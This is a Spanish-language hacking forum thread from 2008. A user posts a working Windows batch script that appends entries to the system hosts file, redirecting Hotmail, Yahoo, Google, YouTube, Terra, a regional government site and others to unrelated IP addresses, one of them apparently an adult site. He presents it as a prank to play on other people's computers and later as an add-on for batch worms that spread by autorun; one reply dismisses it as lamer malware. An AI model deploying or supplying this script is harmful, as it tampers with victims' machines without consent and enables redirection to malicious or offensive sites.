Código de batch de restricción de I.Explorer

Iniciado por corax, 25 Junio 2008, 17:50 PM

0 Miembros y 1 Visitante están viendo este tema.

corax

Buenas a todos otra vez.

Visto el (poco) éxito que tuvo mi anterior aportación sobre el código de ataque a lsass para evitar que el PC pudiera ser apagado, me arriesgo a volver a quedarme solo ante esta nueva explicación tan apañada sobre cómo hacer el gracioso con el archivo de hosts.

Todos conocemos el típico truco de redireccionar a localhost (127.0.0.1) ciertas páginas de intertet para evitar que el usuario las pueda ver. [Claro claro... ¿quién no ha resistido la tentación de hacer esta  :rolleyes: inocente  :rolleyes: gamberrada para reirse un rato a costa de otro]

Pues bien, si hemos redireccionado alguna vez una página hacia localhost, ¿podríamos redireccionar una página web hacia OTRA página web asignándole a la dirección de la primera la IP de la segunda en el archivo de hosts?

Como probablemente los que no sepan de lo que hablo se hayan perdido, lo explicaré con un ejemplo práctico. (Y el que no sepa qué es el archivo de hosts que se vaya a la wikipedia).

Imaginemos que nuestra página 1 es google.es
La IP de google.es es 216.239.59.104

Ahora, como somos tan inocentes, escogemos como página 2 a zorritas.com
La IP de zorritas.com es 70.86.199.78

[Las IP's se determinan mediante ping en la línea de comandos]

Ahora imaginemos que queremos que al entrar en la página 1 nos redireccione a la página 2. (es decir, que en nuestro navegador pongamos google.es y nos mande, para nuestra grandísima sorpresa, a zorritas.com ¿qué gracia ehh? Seeh, que te lo hagan a ti  :xD).

En ese caso, la línea del archivo de hosts debería quedar así:

70.86.199.78   google.es

un código en batch capaz de hacerlo es el siguiente:

echo 70.86.199.78   google.es>>"%WINDIR%\System32\drivers\etc\hosts"
[como todos ya deberíamos saber, el archivo de hosts no tiene extensión...]

Por tanto, un verdadero restrictor sería:
Código (bash) [Seleccionar]

@echo off
echo #Critical system entries>>"%WINDIR%\System32\drivers\etc\hosts"
echo 70.86.199.78 hotmail.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 70.86.199.78 www.hotmail.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 82.98.86.175 es.mail.yahoo.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 82.98.86.175 yahoo.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.130.44 terra.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.130.44 www.terra.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 66.199.187.181 google.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 66.199.187.181 www.google.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 217.113.244.80 google.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 217.113.244.80 www.google.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.197.82 elhacker.net>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.197.82 www.elhacker.net>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50 fotolog.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50 www.fotolog.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50 youtube.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50 www.youtube.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 208.73.212.12 tibia.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 208.73.212.12 www.tibia.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 216.34.131.135 jccm.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 216.34.131.135 www.jccm.es>>"%WINDIR%\System32\drivers\etc\hosts"
exit


Venga, sed buenos y no lo uséis para amargarle el día a vuestra exnovia.

Sobra decir que no me responasbilizo de lo que hagáis con el código. De hecho, sería un poco surrealista que le dijérais al juez: "Señor juez, es que fulanito se responsabilizaba de que yo le jodiera el ordenador a mi hermano...". No, la verdad es que no cuela  :xD
A sí que ya sabéis... bajo vuestra entera responsabilidad.

Hasta otra!
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.

corax

No respondáis todos a la vez, que no doy a basto...  :¬¬

Se agradecen comentarios, dudas, consultas, sugerencias, amenazas a mi integridad...
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.

Red Mx

no quieras que te aplaudan con cosas tan lammers de este tipo
Desarrollar Malware Es Causa De Cancer...

corax

no pretendo que me aplaudan  :¬¬

De hecho, se han publicado códigos de gusanos en batch de propagación por autorun, y nadie los ha tildado de lammers. Es más, siempre han dado pie a un bonito intercambio de ideas.

Este pretende ser un complemento simple, no lammer, para agregar a gusanos en batch.

En fin, que si tanto te ha ofendido el post, lo elimino y punto...
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.